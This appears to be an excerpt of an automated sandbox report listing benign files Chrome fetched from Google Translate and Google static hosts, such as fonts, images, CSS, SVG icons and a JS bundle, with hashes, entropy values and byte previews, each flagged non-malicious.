                                                                                                                                                                                                                                                            Preview:@charset "UTF-8";/*! normalize.css v3.0.1 | MIT License | git.io/normalize */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background:0 0}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-webkit-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{co
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 15552, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):15552
                                                                                                                                                                                                                                                            Entropy (8bit):7.983966851275127
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:HDKhlQ8AGL0dgUoEGBQTc7r6QYMkyr/iobA2E4/jKcJZI7lhzi:jslQ+LhUoTB0Qr6Qjkg/DmcJufzi
                                                                                                                                                                                                                                                            MD5:285467176F7FE6BB6A9C6873B3DAD2CC
                                                                                                                                                                                                                                                            SHA1:EA04E4FF5142DDD69307C183DEF721A160E0A64E
                                                                                                                                                                                                                                                            SHA-256:5A8C1E7681318CAA29E9F44E8A6E271F6A4067A2703E9916DFD4FE9099241DB7
                                                                                                                                                                                                                                                            SHA-512:5F9BB763406EA8CE978EC675BD51A0263E9547021EA71188DBD62F0212EB00C1421B750D3B94550B50425BEBFF5F881C41299F6A33BBFA12FB1FF18C12BC7FF1
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......<...........<Z.........................d..z..J.`..L.\..<.....<.....^...x.6.$..6. .... ..S..}%.......|....x..[j.E...d..-A...]=sjf$X.o.5......V....i?}.\...;...V......5..mO=,[.B..d'..=..M...q...8..U'..N..G...[..8....Jp..xP...'.?....}.-.1F.C.....%z..#...Q...~.~..3.............r.Xk..v.*.7t.+bw...f..b...q.W..'E.....O..a..HI.....Y.B..i.K.0.:.d.E.Lw....Q..~.6.}B...bT.F.,<./....Qu....|...H....Fk.*-..H..p4.$......{.2.....".T'..........Va.6+.9uv....RW..U$8...p...........H5...B..N..V...{.1....5}p.q6..T...U.P.N...U...!.w..?..mI..8q.}.... >.Z.K.....tq..}.><Ok..w.. ..v....W...{....o...."+#+,..vdt...p.WKK:.p1...3`. 3.......Q.].V.$}.......:.S..bb!I...c.of.2uq.n.MaJ..Cf.......w.$.9C...sj.=...=.Z7...h.w M.D..A.t.....]..GVpL...U(.+.)m..e)..H.}i.o.L...S.r..m..Ko....i..M..J..84.=............S..@......Z.V.E..b...0.....@h>...."$.?....../..?.....?.J.a,..|..d...|`.m5..b..LWc...L...?.G.].i...Q..1.:..LJV.J...bU.2.:\.kt.......t.....k....B..i.z+...........A.....
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 660 x 333, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):163289
                                                                                                                                                                                                                                                            Entropy (8bit):7.989125491068949
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:WiUIaXAhs2y/pRbSHcdujFc9mXLD4gra7Qpw4eAaH/XvoIkDh/yNLBACewu:WjXcavrKq6vy7swltXqDh/Ui3T
                                                                                                                                                                                                                                                            MD5:087DE35333C38A74D70911B06B8A4925
                                                                                                                                                                                                                                                            SHA1:A4971DEB635A5718013DF52B161FBE61F236592F
                                                                                                                                                                                                                                                            SHA-256:5CF833E87BBF262985CA366DEC0ABE4A0FA850F702E79BDCB1028307532F2601
                                                                                                                                                                                                                                                            SHA-512:13CAD730106C3BB0185BE13AF310E77E3163387A137D81F850E4B666382F6ECEC9662BD3FE19FD39192B11FA3980D214394ECE5DC2061BAF6E7E2D4B191A9076
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR.......M.....1th.....sBIT.....O...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2.. .IDATx...w.e.]......7...s...<( .c.. ........,...........`.........0&........49O.t......|O.{...................N...|..Af..,.^?.z.eY.eY_...eY..:c..,.^glx[.eY...o.,.z...mY.eY.36.-.,.u..eY.e....,...K..]..6.-.nfx..3........eY..k0...M....6._7lx[.e..........]\. ..#6.-.nB<..6...3On.._y.~..h \........q..,...Q....f...'........_c...........q..,....Q..z]y...WKO..x..3.~.........76..eY7...4......O.,.g..}._...C....z.....,.. ..0j4....#......;:..........z.....o....a3...W...1D....J...3...../..?i.>.:..m+....eY..%.....m..4#(.2%.Ev..0.`........g....l...plx[.e.\.a0.t.g.6.f.k......(.n...?R..O?P...h..mA....,..0.h8.......O..6d./.6.....Y;..L........{..O.....eY.M$..N..\=^8......."..ja..#.Gp..?.:$%..~..k.dp.$..t...?..eY7.K......%<.i7.)...C.\4-w...D...d..I..f&C...o...8:.<.....}...mY.uS`.`.t{.r....#..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):55071
                                                                                                                                                                                                                                                            Entropy (8bit):7.9855086843361205
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:A5FlH0nIlHG/om4W28NTCFkAmD+60ExHPY/gbwqTEXY/0ZwAN:KDdaomxxUFkA8p0fGTI40CAN
                                                                                                                                                                                                                                                            MD5:D345F3E99F2F2D3307D44D6BF232687D
                                                                                                                                                                                                                                                            SHA1:E155B5E28A82C8EB267F4869A7CF45F23AD37CF7
                                                                                                                                                                                                                                                            SHA-256:49B436D79C72E16A01B1EC23D6AECADD7077A6143DB7C403A3BC500796EA455B
                                                                                                                                                                                                                                                            SHA-512:D1396CDBFD41E7C9178F43DFBCC16D890281B5208F959901DD9785B0999DE15C757C15DED8641A2A3DB508B3518320E28D2729E1F40BDC789D072FFA0908216A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/DadS_3zeQeDcl8UL1JN5Fde-_q5NFV2n6-0So7Ylpd00U0i3zhPXRGJJv98HlfKif4nPzY73AoYQWeuX55cYuZ0Puc45APIrNEYbdmsYLJhpI0sBXLk
                                                                                                                                                                                                                                                            Preview:......JFIF...................................................................................................................................................... ..............................................J........................!.1A.."Qa.2q...#B....R..3b..$r....4CSs..........................................:........................!1A.Qa.."q...2.#B.....3Rb.Cr...S............?....Cgs.. .S.~.......BQ.....BY......}~...Y..,.....!.W>g...!.?\[ ....A;..~..;.>.\B.$>.\B...3..!...?\B.$>g.BI..oe;5....".........q.<H|..\@..O..,F....*.......J|....ps.J..}~..........3.....k.......C...~..;.>g.A.S.~..........('..........5.>d.J.Q....B........!....+.|....q..t......N....!............!............!..C\....3.>g. .!.8.A;..qD;..?\B...3..!...?\B..C.~..A....#I.q.'x|......O...3.?...w...q.wx|.......!.#...c.!...l..r5..&....+p......(./...).,~.B...U....6........BV..B.$...J..Q.b...!..b.LB..W..... .B.x...Q...Y..@.t=N.M.{.|.. .1.O...Y...B2..E.. .X.!.v.Q..C...A{..]...(.b..hQ...q6..X+.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2353)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):248291
                                                                                                                                                                                                                                                            Entropy (8bit):5.502100188142168
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:MuZ9l3XuRhAx0msAp40fiU6oUnBdzXlE6aJea:MuFeXAxXpjfaBdza6Sea
                                                                                                                                                                                                                                                            MD5:3A5D01D1F5D363FF71F3A1CDDF28334C
                                                                                                                                                                                                                                                            SHA1:37056A59BA5958F99453F1617286C22C54F52436
                                                                                                                                                                                                                                                            SHA-256:DEB79D09F5B8A2D57EFB1BEE3DB287CE6803412900A0C6C105EC8C2C11D263CA
                                                                                                                                                                                                                                                            SHA-512:C0569C1B14AA64155EC8F4711EF4849424DF067F48359FE972B7163FA580D752A4D6F56AA988CA6A17A366C7B0A537E4BE8FBF922ABA39EAB614A55D05B83094
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverWebsiteTranslationUi.en.o0mxDulwOdA.es5.O/ck=boq-translate.TranslateWebserverWebsiteTranslationUi.2YpHW3SIPH4.L.B1.O/am=8CwACA/d=1/exm=_b,_r,_tp/excm=_b,_r,_tp,iframenavigationview/ed=1/wt=2/rs=ANkVxDmi4UYesv_--ainEA18nAlROTRZyg/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;zxnPse:GkRiKb;EVNhjf:pw70Gc;JsbNhc:Xd8iUd;oGtAuc:sOXFj;eBAeSb:zbML3c;NSEoX:lazG7b;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;pXdRYb:MdUzUe;nAFL3:s39S4;iFQyKf:QIhFr;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=n73qwf,ws9Tlc,GkRiKb,e5qFLc,IZT63,UUJqVe,O1Gjze,byfTOb,lsjVmc,xUdipf,OTA3Ae,COQbmf,fKUV3e,aurFic,U0aPgd,ZwDk9d,V3dDOb,pKzUve,O6y8ed,PrPYRd,MpJwZc,LEikZe,NwH0H,OmgaI,XVMNvd,L1AAkb,KUM7Z,Mlhmy,CXsKQe,s39S4,lwddkf,gychg,w9hDv,EEDORb,RMhBfe,SdcwHb,aW3pY,P5Thrf,pw70Gc,EFQ78c,Ulmmrd,ZfAoz,Z5uLle,xQtZb,JNoxi,kWgXee,BVgquf,BBI74,QIhFr,ovKuLd,yDVVkb,hc6Ubd,SpsfSb,KG2eXe,MdUzUe,VwDzFe,zbML3c,zr1jrb,A7fCU,Uas9Hd,pjICDe"
                                                                                                                                                                                                                                                            Preview:"use strict";_F_installCss(".EDId0c{position:relative}.nhh4Ic{position:absolute;left:0;right:0;top:0;z-index:1;pointer-events:none}.nhh4Ic[data-state=snapping],.nhh4Ic[data-state=cancelled]{transition:transform 200ms}.MGUFnf{display:block;width:28px;height:28px;padding:15px;margin:0 auto;transform:scale(0.7);background-color:#fafafa;border:1px solid #e0e0e0;border-radius:50%;box-shadow:0 2px 2px 0 rgba(0,0,0,.2);transition:opacity 400ms}.nhh4Ic[data-state=resting] .MGUFnf,.nhh4Ic[data-state=cooldown] .MGUFnf{transform:scale(0);transition:transform 150ms}.nhh4Ic .LLCa0e{stroke-width:3.6px;transform:translateZ(1px)}.nhh4Ic[data-past-threshold=false] .LLCa0e{opacity:.3}.rOhAxb{fill:#4285f4;stroke:#4285f4}.A6UUqe{display:none;stroke-width:3px;width:28px;height:28px}.tbcVO{width:28px;height:28px}.bQ7oke{position:absolute;width:0;height:0;overflow:hidden}.A6UUqe.qs41qe{animation-name:quantumWizSpinnerRotate;animation-duration:1568.63ms;animation-iteration-count:infinite;animation-timing-func
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):14171
                                                                                                                                                                                                                                                            Entropy (8bit):4.5751212723122086
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:+xzbtTed93PDg7LKbgx2fvQa0ClHFGnXEGxVbY1NqCwYfiw:+BbtTedhcfKbgx0vQa0ClHknXEGPY1Iw
                                                                                                                                                                                                                                                            MD5:1E4B429549770CEDF96CFCD074FDA539
                                                                                                                                                                                                                                                            SHA1:CA9FD873C2F32CEF2FF071B9C44F0465DD2E42DE
                                                                                                                                                                                                                                                            SHA-256:34A8C0C5D8324D7D4CE7B8D5B182347F6D51DA4B80E16695F9400181B1E73255
                                                                                                                                                                                                                                                            SHA-512:6CCB42AE46C9140705D83DEA7911C635E752F38C7BC139FC7EB6268F82B6862C9057462C60F85596241BB14E4F459AEE0934811E1140FD5F6FECFDE2250249F2
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://translate.google.com/about/static/img/glue-icons.svg
                                                                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg"><defs><svg id="chevron-left" viewBox="0 0 24 24"><path d="M16.41 5.41 15 4l-8 8 8 8 1.41-1.41L9.83 12"/></svg><svg id="chevron-right" viewBox="0 0 24 24"><path d="M7.59 18.59 9 20l8-8-8-8-1.41 1.41L14.17 12"/></svg><svg id="expand-less" viewBox="0 0 24 24"><path d="M18.59 16.41 20 15l-8-8-8 8 1.41 1.41L12 9.83"/></svg><svg id="expand-more" viewBox="0 0 24 24"><path d="M5.41 7.59 4 9l8 8 8-8-1.41-1.41L12 14.17"/></svg><svg id="arrow-back" viewBox="0 0 24 24"><path d="M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z"/></svg><svg id="arrow-forward" viewBox="0 0 24 24"><path d="M12 4l-1.41 1.41L16.17 11H4v2h12.17l-5.58 5.59L12 20l8-8-8-8z"/></svg><svg id="arrow-upward" viewBox="0 0 24 24"><path d="M4 12l1.41 1.41L11 7.83V20h2V7.83l5.58 5.59L20 12l-8-8-8 8z"/></svg><svg id="arrow-downward" viewBox="0 0 24 24"><path d="M20 12l-1.41-1.41L13 16.17V4h-2v12.17l-5.58-5.59L4 12l8 8 8-8z"/></svg><svg id="arrow-left" viewBox="0 0 24 24"><path d="M1
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 1000 x 400, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):171779
                                                                                                                                                                                                                                                            Entropy (8bit):7.976016019340182
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:dfPY4FdhdHgLCgYQYL3zqYjevvImmGxlzS6PM8AZ16s5lJ1Jefpg6P6THbo:dXFDeLpYx32Yj9dYzM8C1pnJT/t7o
                                                                                                                                                                                                                                                            MD5:03F36C26143FDC7F1DAC72071157BEC0
                                                                                                                                                                                                                                                            SHA1:8F1B104F2F8AF306322141022AB17F1A1BE98DCB
                                                                                                                                                                                                                                                            SHA-256:3967A2828CC0A6A4C78B36DC098E1335354C73376B1A6E29A4E0706D867454AF
                                                                                                                                                                                                                                                            SHA-512:811BC1E52408E49E3418FF92CE925D875FF32D52B3446EBE3E7CB063B965D67EC4B72BE19095E6E810A95F6BCCD548706B1B282E7E2A45BA1A1C1DF5C6495A13
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR................S....PLTE.......................................................................................................................................................}..z....z....p..t..w..l..s.......p..m...}k.{i......yg....p.......xf............ve...uc.tb.s`~q`...{l|o^mcWrj]zm\_\RWUN:7;g`Uyqcd_UhcXum_..}vhofZJIENOJNMG516]YOSRLkaVZRF\UJl_Qlh\ZXPWSKZUMd]SBDBb[P><@QJ@`TGoaRILJthXEGFD@8JE=UOD...i]OSPIfZLcWIreUYMAwkZ$.&..._YM....../)0......{.|......irq..................a^`.........p..K.....hozx.....V......eooKQQQST............Y```gg\ddNHOv..bkkV\\...jvuE@Fr.~RXX{................................z.......z......o....}.........h.q..e.t[.r`....m..t.y....gD.\8.7..P1.I*~ ..u..i.{Y.oL.t*.g...e..^...qv<.X.D.{8.C............J....IDATx....r.0.D.n..?.....Fg.S....,..O.....f}I..z...D_M)...n.m.R2NdF..RJ)...$..J).M.Z.9....@nG7`.f.$R.l.B.....H.].....a........K.........(..#....g.VA...Z..R..]F<sA.d.m.xjf
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):15344
                                                                                                                                                                                                                                                            Entropy (8bit):7.984625225844861
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:ctE5KIuhGO+DSdXwye6i9Xm81v4vMHCbppV0pr3Ll9/w:cqrVO++tw/9CICFbQLlxw
                                                                                                                                                                                                                                                            MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
                                                                                                                                                                                                                                                            SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                                                                                                                                                                                                                                            SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                                                                                                                                                                                                                                            SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h|.l....A....b6........(......@e.]...*:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#*e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.*UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...*$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf*.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed.*.'..qP....M..j....../.z&.=...q<....-..?.A.%..K..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 660x238, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):209779
                                                                                                                                                                                                                                                            Entropy (8bit):7.713145318670088
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:aRNRNRoD/G3VAW9Zi600000T5Z5+5+5rvAGe9p:aRNRNRyGFANII9vAGi
                                                                                                                                                                                                                                                            MD5:DB67E219012CF840418D1803DF203E1D
                                                                                                                                                                                                                                                            SHA1:EC6D20E8EA58A9AEF40DCA57F7E2E17FBB8CFD97
                                                                                                                                                                                                                                                            SHA-256:740FBFA475E148CD7368D0A65A69A1B579616661E8EC518789AADCFCDE5C03D9
                                                                                                                                                                                                                                                            SHA-512:F6F5D01E83BE5C51F708C1BD0DA26805E4BE9A31E7C50BA71F378A202FDE47F64D558A55A14DA0453DD9C82C313EEBE37BD2AF23D9658C7BEF9924274971EDE0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Picasa......ICC_PROFILE......XKCMS....mntrRGB Lab .........2..acspMSFT....KODAsRGB........................KODA................................................A2B0...D...4bXYZ...x....bTRC.......B2A0......jcprt.......Gdmnd...L...wdmdd.......[gXYZ... ....gTRC.......lumi...4....wtpt...H....desc...\...zrXYZ........rTRC.......vued.......Fview...4...$mft2.....................................................g.......6.....Q.......O.(...........-.W.......k.....I.......\ .!.#.$X%.&.(.)A*x+.,.../I0{1.2.4.576d7.8.9.;.<6=^>.?.@.A.C.D:E\F}G.H.I.J.L.M5NQOmP.Q.R.S.T.V.W.X3YIZ_[t\.].^._.`.a.b.d.e.f'g6hEiSj`knlzm.n.o.p.q.r.s.t.u.v.w.x.y.z.|.}.~..........!.$.'.).*.,.-.........-.,.*.).&.$.!..........................................w.l.a.V.K.?.3.'.....................p.a.Q.@.0................~.k.X.D.1..............v.`.J.4.............{.c.J.2............h.M.3...........v.Z.>."...........u.X.:.........g.......6.....Q.......O.(
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):1660
                                                                                                                                                                                                                                                            Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                            MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                            SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                            SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                            SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 1400 x 420, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):265572
                                                                                                                                                                                                                                                            Entropy (8bit):7.9833672181816455
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:gNoj3jGLCoTVgcwjIA5sWiW2vLHG7xrJQnKHgrx+O8iiJeVcniIImEImo6pOBjRw:iojq3uXsvLMNQnn+O81eVlmEIh6pOk
                                                                                                                                                                                                                                                            MD5:180E2F43D5E0271E1A0C706C416213AB
                                                                                                                                                                                                                                                            SHA1:AE70DD5A3206F6611429A1AA18E0A1DB2B49854F
                                                                                                                                                                                                                                                            SHA-256:7D609854BD0FF0D600DF53098BA765703D7802F697875472FFB10F80BCF31F73
                                                                                                                                                                                                                                                            SHA-512:E48949862212177E8470741B8430DA9F2DE1D3C0D414CB90D00337E4B3B7732629813E21BA2124CD1EE818D533BB96BCE89F511862FE7F91C2E6BEE02FA8C793
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2019/netherlands-elections-2019-5158774833676288-2x.png
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR...x...........Mp...+IDATx.....A......%.".i.>..B..R...$"$..9.ng..y....m..o........[......@......./....../....../......................... ...... ...... ......0.r....._.fe.w.]NUKRIz...Z..[s...R.L..j...y*mkn.8..>}.d|.......=&.z..,._../.r....u7.......k}.o..x.....J*k*c...q.<.5.o....Y..m...w.?fa.u..x.'O.....x..vme.W...\..(.fS...}..?._?.Y........U..bYR,...>.WS..V........i.m.a..b.O..._..... ....c.e.........w+...M...\Uw9..<..sz....../Y..,x..OJ.m.,I.^.....!........<..2g[T.d..4M...{..O....^....7..g.(%.8.i..OoI..... ...,c.7.]....k..S~...@...,x.].V]U..t]...>....x..V.....a[U]r....!....../..*.<d./)e.._./}........../.....2..h...u...*../.......*,C.e.&..(%i.Kvw.y...... .......m1.K....)...Y....x....2....+%..%ms...!O...........,...T..).....KJUg...@.....6I....~..6M^...........o..=....\.._NY....x....R.l...r...^...}........`.<tI.....x.a...........p.<^R...s..;.RJ...U......`..,.5)u.E)%]wI.{.........*....e..)..(%i.K....?.........,c.e..R...i..4]..<.^......
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1660
                                                                                                                                                                                                                                                            Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                            MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                            SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                            SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                            SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
